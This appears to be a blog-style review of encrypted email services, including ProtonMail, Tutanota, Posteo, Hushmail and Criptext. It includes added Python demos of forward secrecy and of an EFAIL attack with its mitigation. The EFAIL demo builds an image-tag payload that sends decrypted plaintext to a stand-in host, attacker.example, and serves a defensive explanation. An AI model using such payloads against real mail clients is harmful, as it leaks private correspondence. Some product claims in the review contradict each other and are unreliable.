Editor’s note: This article is the third in a series focusing on the best encrypted apps and services available. Content has been provided by an anonymous security and privacy professional. Readers are encouraged to verify this information on their own.

ProtonMail

ProtonMail was founded by CERN and MIT scientists after the Snowden leaks. Their goal was an encrypted email service that is just as easy to use as an unencrypted one. ProtonMail is partly open source: the browser-based JavaScript that does the encryption can be inspected simply by using a browser's "view source" tool. It was originally audited by CERN's computer security staff, and later by outside professionals donating their time, who also got access to the back-end code. ProtonMail has been trying to become completely open source for a long time (unpolished code would not be flattering), but resources are limited. They do, however, maintain an open source library (OpenPGP.js).

ProtonMail gives free accounts one address and 500 MB of storage; additional storage, alias addresses, and other features can be bought piecemeal or bundled. Paid users can also download their mail into an IMAP/SMTP client via the ProtonMail Bridge application. ProtonMail is based in Switzerland (one of the perks of working at CERN, along with a lunchroom full of top engineers as a captive audience), though it once drew criticism for sharing metadata with law enforcement in a kidnapping case in which a court order was inevitable but had not yet been issued. Timers for ephemeral emails are set in hourly increments, with the longest delay being four weeks, using drop-down menus for weeks, days, and hours. Encrypted email to out-of-network recipients can only be ephemeral (that is, it becomes impossible to decrypt once the timer expires), defaulting to four weeks. I don't know what the purpose of that is, but it hasn't caused any problems.

 

ProtonMail is HIPAA compliant, which doesn't mean it has met a higher security bar than the others, but it's useful if you want or need to show due diligence for business purposes. Paid ProtonMail features can also be bundled with a paid tier of ProtonVPN at a discount. (Note: if a VPN is free, rather than merely having a free tier, it's spying on you, at best.) Subscriptions start at one user, 5 GB of storage, 5 addresses, 1000 messages/day, and 200 folders/labels for 5 USD, EUR, or CHF per month or 48 per year. For businesses with up to 50 email users, a ProtonMail "Professional" subscription with additional features is available. ProtonMail is popular in the privacy and security community (it's used by some of the experts I link to at the bottom and by Restore The Fourth, among others) because the company supports privacy-related causes, is slowly building a suite of privacy tools, and was early to market. ProtonMail is also the only one of the established providers reviewed here with ephemeral messaging (Criptext, still in beta, has a variant of it), which isn't a hugely important feature, but I think it is good to have.

ProtonMail flaws (but not deal-breakers):

For most people, the biggest negative will be the price. If you're a power user with multiple aliases and domains, a business or family with multiple users, or bundling email and a VPN, the price structure may beat the others. But ProtonMail isn't very cost effective for someone who just needs more than 500 MB of storage and IMAP/SMTP support, especially someone who isn't used to paying for email. Aliases are also permanent, so you can't delete one to free up its slot; once you hit your plan's limit you must buy another. Some may opt for another provider because of the lack of an integrated calendar. A calendar has long been planned but has yet to arrive (I'm not holding my breath). ProtonMail is also a poor choice for throwaway accounts, as it uses SMS verification to limit spam signups.

As mentioned above, ProtonMail can now add outside public keys to contacts. This worked three out of four times. Support, whom I have always found pleasant, told me that the fourth time I had used an expired key, though the contacts manager showed it as current. I'm considering the bug a minor nuisance, for now.

 

The Competition to ProtonMail:

 

Tutanota

Tutanota (faux-Latin for "secure message") is fully open source and independently audited. It's also freemium, has apps, and is fairly popular. Again, this is the only email provider here that encrypts subject lines. The free tier has a gigabyte of storage and the ability to search a month's worth of email bodies (that is, bodies are decrypted client-side, so your search isn't limited to metadata). But that's it: no filters, no inbox rules, and no support. The "Premium" and "Pro" tiers and the piecemeal "expansions" may or may not be more cost-effective than ProtonMail for the same combination of features; if you're a nonprofit organization, accounts are heavily discounted. One purchasable feature is an encrypted contact form, but at its price (€24/month), consider PGP instead: there are HTML/PHP examples you can copy and paste, or even a WordPress plugin.

As for the search function, I've always found an email by recipient and/or subject when searching my ProtonMail account. I can think of times, however, when I've needed to do that in the past, so I could see some favoring Tutanota for this reason. I'm underwhelmed with the search feature, though. Tutanota uses an indexing process that has to be repeated on the first search of every session (and you can't choose to search only sender/recipient and subject line), which could be very inefficient in both time and data. Moreover, the search misses some emails, and because it's an indexing system, you can only search for whole words. Tutanota says it will use an API to add interoperability, but isn't clear on how that would work.

I use Tutanota for throwaway accounts. If you trip their spam detection algorithm, they simply put a 48-hour hold on the account.

Tutanota flaws (but not deal-breakers):

One thing people can find annoying about Tutanota is that password-protected emails don't carry a hint for the password; others will mind the lack of IMAP and a calendar. Another downside may be their corporate culture. Compare this Tutanota blog post with this ProtonMail blog post. I don't care to speculate whether this reflects any problems Tutanota has with professionalism, but I think it's fair to highlight it when comparing services.

 

Posteo

Posteo costs just €1/month, is open source and audited, and has most features you would want, including an encrypted calendar and notes; they're even environmentally conscious. As mentioned above, Posteo also allows non-users to add their PGP public keys to its directory, partially fixing the interoperability problem. If you find Posteo appealing for its calendar, note that shared calendars are visible to anyone who has their URL.

Why Posteo doesn’t really qualify for this list, and why you probably won’t use it:

The first problem you'll find with Posteo is that it doesn't have a free tier. At €1/month on monthly terms for the most basic account (which is very generously featured), Posteo is no great expense, but it makes it that much harder to get your friends to join. As for a free trial, there is a 14-day grace period to add credit, but there are major restrictions on your account during this period. This is probably how they can offer so many features for €1/month.

The second problem is that Posteo doesn't have its own mobile apps, so it technically doesn't meet my requirements, one of which was that an encrypted service should be as fully featured and easy to use as an unencrypted app/service. The third issue is a possible professionalism problem, again with regard to how they respond to criticism. But I can't read German, so I can't go into detail on that.

As for the actual encryption, most of Posteo's encryption tools are off by default, and email encryption is done with a browser or email-client extension, which is what we're trying to avoid. Posteo has its own key directory and a relatively seamless interface with a PGP browser extension, but the encryption isn't actually part of Posteo, meaning that even intra-network emails aren't automatically encrypted. And if you need to read this to know how and why to use encrypted communication, creating a Posteo account probably won't be what gets you into gear.

If all you care about is your email provider respecting your privacy (and you don't mind stock mobile apps), Posteo is a great choice. But I don't recommend it for encrypted email unless you're already using your own encryption tools and just need a better provider for transit. The same goes for Mailbox.org and Cock.li (yes, that's a real email provider).

 

Hushmail

Hushmail, the oldest encrypted email provider, is similar to ProtonMail in both interface and technology (OpenPGP), but is somewhat infamous for having decrypted email at a court's request. Pricing is also similar. It's also HIPAA compliant and offers secure forms for business, albeit at $120/year. The big differences for individuals are that Hushmail offers unlimited aliases, albeit in a format some might not like, and that its key-management system for interoperability is overly complicated, with poor instructions. I'm not convinced by Hushmail's bargain for individuals. If you're a business, on the other hand, Hushmail may be the best option: ProtonMail and Tutanota have business tools, but their raison d'être is post-Snowden privacy for the common man, while Hushmail seems to have been created as a business tool.

Why I didn’t put Hushmail up with ProtonMail for individuals:

Because they don’t decrypt emails, the lack of an Android app, and their privacy policy. (Compare with ProtonMail’s.)

 

Criptext

Criptext is still in beta, but it's an interesting service. It's open source, based on the Signal Protocol, and currently free. Everything happens on your device; the emails are even stored there rather than on central servers. Additionally, rather than one long-term key protecting everything you've ever been sent, a fresh key is derived for each message and discarded after use, so a compromise of your current keys doesn't expose earlier messages (this is called "forward secrecy"). That's the most secure way of doing things, and it's also the most scalable, since it doesn't depend on a central server holding everything.
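To make the forward-secrecy claim concrete, here is an added illustration (my own code, not Criptext's or Signal's) of the symmetric-key ratchet the Signal Protocol uses to get a fresh key per message. The shared secret, the messages and the "stolen device" scenario are all constructed; the real protocol derives the starting secret from a Diffie-Hellman handshake and also copes with out-of-order delivery, which this toy deliberately does not.

```python
"""Per-message keys from a hash ratchet (forward secrecy), added illustration.

Both peers start from the same shared secret and advance a "chain key"
once per message. Each step yields a one-time message key and is one-way,
so stealing the current chain key reveals nothing about earlier keys.
"""
import hashlib
import hmac
import os


def kdf_step(chain_key: bytes) -> tuple[bytes, bytes]:
    """Derive (next_chain_key, message_key) with two domain-separated HMACs."""
    next_chain_key = hmac.new(chain_key, b"\x01", hashlib.sha256).digest()
    message_key = hmac.new(chain_key, b"\x02", hashlib.sha256).digest()
    return next_chain_key, message_key


def keystream(key: bytes, length: int) -> bytes:
    """SHA-256 in counter mode; a stand-in for a real stream cipher."""
    blocks = [hashlib.sha256(key + i.to_bytes(4, "big")).digest()
              for i in range((length + 31) // 32)]
    return b"".join(blocks)[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class SymmetricRatchet:
    """One sending direction. The receiver holds an identical copy and
    advances it in lock-step (in-order delivery assumed in this toy)."""

    def __init__(self, shared_secret: bytes) -> None:
        self.chain_key = shared_secret
        self.index = 0

    def _next_message_key(self) -> bytes:
        self.chain_key, message_key = kdf_step(self.chain_key)
        self.index += 1
        return message_key

    def encrypt(self, plaintext: bytes) -> tuple[int, bytes, bytes]:
        message_key = self._next_message_key()
        ciphertext = xor_bytes(plaintext, keystream(message_key, len(plaintext)))
        # Toy MAC reuses message_key; a real design derives a separate MAC key.
        tag = hmac.new(message_key, ciphertext, hashlib.sha256).digest()
        # message_key is dropped here; only the advanced chain key survives.
        return self.index - 1, ciphertext, tag

    def decrypt(self, index: int, ciphertext: bytes, tag: bytes) -> bytes:
        if index != self.index:
            raise ValueError("toy ratchet requires in-order delivery")
        message_key = self._next_message_key()
        expected = hmac.new(message_key, ciphertext, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            raise ValueError("authentication failed")
        return xor_bytes(ciphertext, keystream(message_key, len(ciphertext)))


def attacker_can_read(stolen_chain_key: bytes, ciphertext: bytes, tag: bytes,
                      max_steps: int = 16) -> bool:
    """An attacker holding a stolen chain key can only walk it forwards.
    Returns True if any key reachable from the stolen state authenticates
    the captured message."""
    chain_key = stolen_chain_key
    for _ in range(max_steps):
        chain_key, message_key = kdf_step(chain_key)
        expected = hmac.new(message_key, ciphertext, hashlib.sha256).digest()
        if hmac.compare_digest(expected, tag):
            return True
    return False


def demo() -> tuple[list[bytes], list[bool], bool]:
    """Three messages, then the sender's device is compromised, then a fourth."""
    shared_secret = os.urandom(32)  # constructed stand-in for the handshake output
    alice = SymmetricRatchet(shared_secret)
    bob = SymmetricRatchet(shared_secret)

    wire = [alice.encrypt(m) for m in (b"first", b"second", b"third")]
    received = [bob.decrypt(*packet) for packet in wire]

    stolen_chain_key = alice.chain_key  # attacker images Alice's device now
    past_readable = [attacker_can_read(stolen_chain_key, c, t) for _, c, t in wire]

    _, c4, t4 = alice.encrypt(b"fourth")
    future_readable = attacker_can_read(stolen_chain_key, c4, t4)
    return received, past_readable, future_readable


if __name__ == "__main__":
    received, past, future = demo()
    print("round trip:", received)
    print("earlier messages readable after compromise:", past)  # [False, False, False]
    print("later message readable after compromise:", future)   # True
```

The last line of the demo is the caveat worth remembering: a hash ratchet protects the past, not the future. Once the chain key is stolen, every later message in that chain is readable until something injects fresh entropy, which is the job of the Diffie-Hellman ratchet layered on top in the full protocol.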

Instead of intra-network ephemeral emails, Criptext has an "unsend" feature, which can be used at any time. I prefer this, since you can "unsend" a whole conversation at once, at the moment the information actually should become irretrievable, rather than having to remember to set a timer for each email and risk setting it too short. Although ephemeral messaging isn't necessary for most, it's a good option to have. The drawback is that recipients may find it rude. Out-of-network emails are all ephemeral, like ProtonMail's, but become unreadable after just 10 days, which seems too short. (Presumably it's because they need server space for those emails; I would expect longer options to be added if and when they go freemium.) Like Tutanota, there's also no password hint.

Criptext flaws (but not deal-breakers):

Criptext is too new to say much about. Interoperability is essentially out unless there's a radical redesign. It's app-only (iOS, Android, and macOS, with Windows and Linux planned), which could be a major issue for some. (Though if you use a password manager such as KeePass or its derivatives, you probably aren't logging into email on other people's devices anyway.) There's also no contacts manager, just autocomplete suggestions, which means you'd have to use your device's native, unencrypted contacts manager for everything else, which is cumbersome and potentially defeats the purpose of an encrypted email app. I wouldn't recommend it at its current stage, and probably never will, but I could easily see it serving niche purposes.

I quickly came to dislike the company. Their Medium article "It's Time To Drop PGP" is extremely misleading. EFAIL is a long-known and narrow weakness in how some OpenPGP-based clients handle decrypted HTML and unauthenticated ciphertext, not in OpenPGP itself. And while I usually have high praise for the EFF, there seems to be a consensus that they overreacted (and they haven't taken down their own staff members' public keys...), so citing them while cautioning against competitors (they name ProtonMail, which is not affected by EFAIL, and the EFF has never recommended ProtonMail or any other proprietary software) comes across as disingenuous.
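Since the paragraph above only names EFAIL, here is an added illustration (my own code, not from the article, Criptext, or any mail client) of its "direct exfiltration" variant and the client-side mitigation the EFAIL authors recommended for it. The attack sandwiches an encrypted MIME part between two attacker-written HTML fragments; a client that decrypts and then renders the concatenation while loading remote content ends up sending the plaintext to the attacker inside an image URL. The fix is to render decrypted HTML without fetching anything. The attacker domain, the "plaintext" and the surrounding markup are constructed. EFAIL's other variant, malleability of unauthenticated OpenPGP ciphertext, is addressed by rejecting messages whose modification detection code fails and is not shown here.

```python
"""EFAIL direct-exfiltration demo and the remote-content-stripping fix (added example).

A vulnerable client decrypts an OpenPGP part and renders it inside HTML the
attacker placed around it, so the plaintext lands inside an <img src=...>
URL that the client fetches. Stripping every remote-loading element or
attribute before rendering closes that channel.
"""
import html
from html.parser import HTMLParser

# Elements that trigger a network fetch when rendered, split by whether
# they wrap content (and so must be skipped up to their closing tag).
VOID_LOADERS = {"img", "link", "meta", "base", "source", "track", "embed"}
CONTAINER_LOADERS = {"iframe", "script", "style", "object", "video", "audio", "form", "picture"}
# Attributes on otherwise harmless elements that cause a fetch on render.
# Plain <a href> is left alone: it only loads when the user clicks.
LOADING_ATTRS = {"src", "srcset", "background", "poster", "style"}


class RemoteContentStripper(HTMLParser):
    """Re-emits the HTML with everything that would auto-load removed,
    recording the URLs a naive renderer would have fetched."""

    def __init__(self) -> None:
        super().__init__()  # convert_charrefs=True: data arrives unescaped
        self.out: list[str] = []
        self.skip_depth = 0
        self.dropped_urls: list[str] = []

    def _record(self, attrs) -> None:
        for name, value in attrs:
            if value and name in LOADING_ATTRS | {"href", "action", "data"}:
                self.dropped_urls.append(value)

    def handle_starttag(self, tag, attrs) -> None:
        if tag in VOID_LOADERS or tag in CONTAINER_LOADERS:
            self._record(attrs)
            if tag in CONTAINER_LOADERS:
                self.skip_depth += 1
            return
        if self.skip_depth:
            return
        kept = []
        for name, value in attrs:
            if name in LOADING_ATTRS:
                if value:
                    self.dropped_urls.append(value)
                continue
            if value is None:
                kept.append(f" {name}")
            else:
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs) -> None:
        self.handle_starttag(tag, attrs)  # <br/> style tags need no end tag

    def handle_endtag(self, tag) -> None:
        if tag in CONTAINER_LOADERS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if tag in VOID_LOADERS or self.skip_depth:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data) -> None:
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))


def strip_remote_content(decrypted_html: str) -> tuple[str, list[str]]:
    """Return (safe_html, urls_that_would_have_been_fetched)."""
    parser = RemoteContentStripper()
    parser.feed(decrypted_html)
    parser.close()
    return "".join(parser.out), parser.dropped_urls


# --- Constructed EFAIL-style message ---------------------------------------
# The attacker cannot read the encrypted part, so it is sandwiched between an
# unterminated <img> start tag and its closing characters; only after
# decryption does the client see a single, complete tag.
ATTACKER_PART_1 = '<img src="http://attacker.example/collect?body='
DECRYPTED_PART = "Meeting moved to 14:00, bring the signed contract"  # constructed plaintext
ATTACKER_PART_3 = '">'


def vulnerable_render(parts: list[str]) -> str:
    """A client that concatenates decrypted MIME parts into one HTML document."""
    return "".join(parts)


def exfiltrated_urls(document: str) -> list[str]:
    """What a renderer that loads remote content would request."""
    _, urls = strip_remote_content(document)
    return urls


if __name__ == "__main__":
    doc = vulnerable_render([ATTACKER_PART_1, DECRYPTED_PART, ATTACKER_PART_3])
    print("would fetch:", exfiltrated_urls(doc))
    print("after stripping:", repr(strip_remote_content(doc)[0]))
```

The plaintext vanishes from the rendered output along with the image tag, which is exactly what happens in a real client that blocks remote content: the user sees a broken message rather than having it leak. Blocklisting loaders is the conservative choice here; an allowlist of tags and attributes is the usual production approach, but it makes the same point.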

"We Need A New Encrypted Email Service" is a rant specifically about ProtonMail, and doesn't strike me as very fair either. The jurisdiction point isn't wrong, as noted above, but it's a poor criticism. "Secure Email Based in Switzerland" is just a tagline; the real reason ProtonMail is based in Switzerland is the same reason it's called ProtonMail: many of the founders, including CEO Dr. Andy Yen, came from CERN. As for confidence, trust in a VPN and trust in an email service are very different. A VPN knows your IP address and you can never be sure it isn't keeping logs (though if it has recently been subpoenaed and handed nothing over, that's a good sign), while an email service's encryption can be audited. And while Criptext is right to say "We don't trust, we verify," ProtonMail's security has been verified, as has OpenPGP's itself. Thus, having established trust in ProtonMail, it would follow that we can trust ProtonVPN.

The grain of truth, also noted above, is that you need to trust a browser-based encryption provider to serve you the audited code rather than malicious code. However, Criptext, being new, has not been audited at all; people are just trusting that it uses the Signal Protocol and isn't building a massive database of plaintext emails, never mind innocent mistakes (cryptography is hard). And while anyone could in principle check the JavaScript ProtonMail serves against the repository, you can't really do that with an iPhone app. So in practice we actually have to place more trust in Criptext than in ProtonMail. As for key management, if there were a problem with key encryption on session logout, I'd like to think one of the auditors would have spotted it. It could be that I'm a ProtonMail fan blinded by brand loyalty, of course, but these criticisms also just seem disingenuous. Criptext should have the expertise to do its own audit of ProtonMail. A complete audit would be a large undertaking, but not copying and pasting code they think is fundamentally flawed in a way identifiable from the FAQ; if the code really is flawed, why don't they actually show us how?

My own rant over, none of this means their product is bad, of course. But I'd like an explanation for all of it before I give them any money.

What you should NOT use under any circumstances:

Gmail's "confidential" mode. It's just a gimmick: your emails are still stored on Google's servers in a form Google can read. Plus data-mining and evilness, among other things. Google's security is generally thought to be pretty good, though.

With regard to interfaces: ProtonMail can have Outlook-like columns or Gmail-like rows, Hushmail is also similar to Gmail, Tutanota is similar to Outlook, Posteo is similar to Thunderbird, and Criptext looks like every other smartphone email app.